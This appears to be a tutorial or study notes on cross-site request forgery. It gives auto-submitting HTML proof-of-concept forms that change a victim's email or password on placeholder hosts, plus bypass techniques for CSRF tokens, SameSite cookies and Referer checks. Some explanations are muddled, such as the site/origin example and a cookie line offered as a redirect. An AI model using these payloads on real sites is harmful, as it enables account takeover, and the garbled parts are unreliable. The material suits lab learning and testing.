Cross Site Request Forgery

Cross Site Request Forgery

CSRF stands for Cross site request forgery where an attacker trick an victim to click on malicious link and to do intended action like changing password, email, purchasing product etc.

CSRF is easy to exploit you can use burpsuite pro to generate CSRF POC otherwise do things showing below.

<html>
    <body>
        <form action="<https://vulnerable-website.com/email/change>" method="POST">
            <input type="hidden" name="email" value="pwned@evil-user.net" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

save to POC and then exploit by clicking on it.

There are three type of defences against CSRF

• CSRF

• Same-site cookie

• Referrer based

Note: There is bypasses for each weak security

CSRF Token bypass:

• [ ] Token validation depend on method

• [ ] Token being present

• [ ] Token is not tied to session (Try account A token in account B)

• [ ] CSRF token tied to non-session cookie

• [ ] CSRF token is duplicated and does not handle or store token at the server.

Same-site cookie restriction

Site = scheme + 1 + tld

Origin = is full url

example:

https://sub.domain.com:433

Here https, domain.com and 443 is site

and Origin is full url =https://sub.domain.com:433

How does samesite cookie work?

Ans: same site cookie work by limiting the browser from making cross site request, before same site cookie was originated browser does not check where the request is originated from the same domain or not

There are three level in same-site cookie:

1. Strict Same-Site: Strict

2. Lax Same-Site: Lax (Chrome browser by defult apply this security)

3. None Same-site: None

In Strict level website fully restrict from making cross-site request if the host name does not match with name in the bar then request will not get completed

In Lax there is two condition to match to make cross-site request.

• Request uses GET method

• Request resulted from a top-level navigation by the user

In None Same-site restriction is NONE

to solve the labs use script tag and force the user to go to vulnerable link using document.location below is example how you can do it

<script>
			document.location = "Vulnerable GET Request Here"
</script>

If Same-Site restriction is set to Strict then first we need to find client site redirect and if the client side redirect is happening then only we can exploit this scenario

<script>
		document.cookie = "URL here"
</script>

same-site cookie bypass with cookie refresh

Bypassing Referrer based defence

**#1 Token validation depend referrer header being present**
We can remove referrer header from the request using below meta tag:
<meta name="referrer" content="never"> // try with both referer and referrer

**#2 Validation of referer can be circumvented or CSRF with broken Referer validation**
some application validate referer header in a naive way, they validate the certain keywords in the referer header value like domain name
so in this case attacker can host application domain as subdomain and then launch CSRF attack.
Example:
<http://vulnerable-website.com.attacker-website.com/csrf-attack>
<http://attacker-website.com/csrf-attack?vulnerable-website.com>
etc. play with referer header and see how application is validating referer header

• [ ] Lax bypass via override method (found _method parameter) (Changing the request method with overriding the method

• [ ] Strict bypass via client-side redirect

• [ ] SameSite lax bypass via cookie refresh (SSO)

CSRF In JSON body —

To send JSON request in the body of request we can enter the data in name of the tag and value. below is the one of the example of that

{
   “user”: {
         “password”:”Nice_Passw0rd”,
         “password_confirmation”:”Nice_Passw0rd”
    }
}

CSRF POC code would be like below

<html>
    <body>
        <form action="<https://vulnerable-website.com/email/change>" method="POST">
            <input type="hidden" name='{“user”:{“password”:”Nice_Passw0rd”,“password_confirmation”:”Nice_Passw0rd”} "a":' value='"}' />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>